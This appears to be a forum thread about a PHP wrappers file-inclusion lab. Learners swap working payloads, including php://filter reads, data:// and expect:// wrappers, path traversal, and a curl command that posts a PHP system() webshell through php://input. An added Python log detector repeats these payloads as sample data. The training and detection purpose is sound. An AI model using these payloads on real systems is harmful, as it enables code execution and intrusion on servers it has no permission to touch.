PHP Wrappers in the File Inclusions module

Is this room bugged? I had success with the data filter. Added an &cmd=id at the end and it worked. Unfortunately I don’t know how to cat out the flag. I sent it to Burp and even URL encoded the cat /flag but that didn’t work either. I changed the request to a POST in Burp and had no access.

Steps: I did base64 encode the php shell and url encoded it. After that I used it with the data// filter and I was able to get “id” and “whoami” but I wasn’t able to get /flag. Any tips?

Edit: Just for science: I tried to get a reverse shell on the system but that didn’t work. Have you been able to get a shell here? Just curious.

“language=expect://id” didn’t work either…

It’s me again.
I used this one:
php://filter/read=convert.base64-encode/resource=
and added


/flag.txt
/flag/flag.txt
…/…/…/…/…/…/flag.txt

neither of them worked. What am I missing?

You need to look for the file that could contain a flag. It’s not in the same directory as all the other files and it might not be called flag.txt. So next best step is to go through the directories in order to find a possible flag.

Use a wrapper, i.e. the input wrapper, with cmd=ls to list the directory you are in.
Then to list a previous directory:

ls%20..

and then further back
ls%20../../

%20 is just the URL encoding for a blank space

(You could also use the data wrapper, I couldn’t get the expect wrapper to work)
For example to see the directories listed, then just keep going until you find the flag:

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://IP:PORT/index.php?language=php://input&cmd=ls%20…"

1 Like
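From the defender's side, the requests traded in this thread (php://filter, php://input, data:// and expect:// in the `language` parameter, plus `../` traversal and a trailing `cmd=` parameter) all leave a recognisable trace in the web server access log. The following is an added example, not code from the thread or from the lab it discusses: a small Python detector that parses combined-format log lines, fully URL-decodes the watched include parameter, and labels each suspicious request. The parameter names, the wrapper list and every log line are constructed assumptions for illustration.

```python
"""Flag PHP stream-wrapper and path-traversal abuse of an include() parameter
in web server access logs.

Added example, not code from the original thread or the lab it discusses.
Assumptions (all constructed): Apache/Nginx combined log format, a vulnerable
parameter named `language` as in the thread, and the sample lines below.
"""
import re
from urllib.parse import parse_qs, unquote

# Schemes PHP's include() will dereference: the ones seen in the thread plus
# the usual extra suspects. A plain filename like "es.php" never matches.
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|glob|file|ftp|https?):", re.IGNORECASE)
# ".." as a whole path component, forward or back slash, at start or after a slash.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Parameters that commonly feed an include(); assumed names for this example.
WATCHED_PARAMS = ("language", "page", "file", "include", "view")

# Combined log format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample: one benign request followed by the patterns from the thread.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=config.php HTTP/1.1" 200 4096
10.0.0.9 - - [10/Oct/2023:13:56:20 +0000] "POST /index.php?language=php://input&cmd=ls%20../../ HTTP/1.1" 200 221
10.0.0.9 - - [10/Oct/2023:13:56:45 +0000] "GET /index.php?language=data://text/plain;base64,PD9waHAgZWNobyAxOyA/Pg==&cmd=id HTTP/1.1" 200 97
10.0.0.9 - - [10/Oct/2023:13:57:02 +0000] "GET /index.php?language=%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1843
10.0.0.9 - - [10/Oct/2023:13:57:10 +0000] "GET /index.php?language=expect://id HTTP/1.1" 500 0
"""


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding; double-encoding is a common filter bypass."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value):
    """Return finding labels for one include-parameter value (empty if benign)."""
    v = decode_fully(value)
    findings = []
    m = WRAPPER_RE.match(v)
    if m:
        findings.append("wrapper:" + m.group(1).lower())
    if TRAVERSAL_RE.search(v):
        findings.append("traversal")
    if "\x00" in v:
        findings.append("null-byte")
    return findings


def analyze_line(line):
    """Parse one log line; return (ip, method, findings) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _path, _, query = m.group("target").partition("?")
    qs = parse_qs(query, keep_blank_values=True)  # decodes one layer itself
    findings = []
    for name in WATCHED_PARAMS:
        for value in qs.get(name, []):
            findings.extend(classify_value(value))
    # A command parameter next to an include parameter is the classic webshell
    # shape; php://input hides its payload in the POST body, which the access
    # log does not record, so this parameter is often the only visible hint.
    if "cmd" in qs:
        findings.append("cmd-param")
    return (m.group("ip"), m.group("method"), findings)


def analyze_log(text):
    """Return (ip, method, findings) for every request that raised a finding."""
    hits = []
    for line in text.splitlines():
        result = analyze_line(line)
        if result and result[2]:
            hits.append(result)
    return hits


if __name__ == "__main__":
    for ip, method, findings in analyze_log(SAMPLE_LOG):
        print(f"{ip} {method} {', '.join(findings)}")
```

The access log only shows the query string, so a php://input attempt looks like any other POST apart from the wrapper name in `language`; correlating the source IP with the earlier php://filter and data:// requests is what turns single hits into an incident. On the prevention side the same class of input should never reach `include()` unvalidated: an allow-list of language files and `allow_url_include=Off` removes the remote and data wrappers, though php://filter and expect:// still need the allow-list.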

thanks man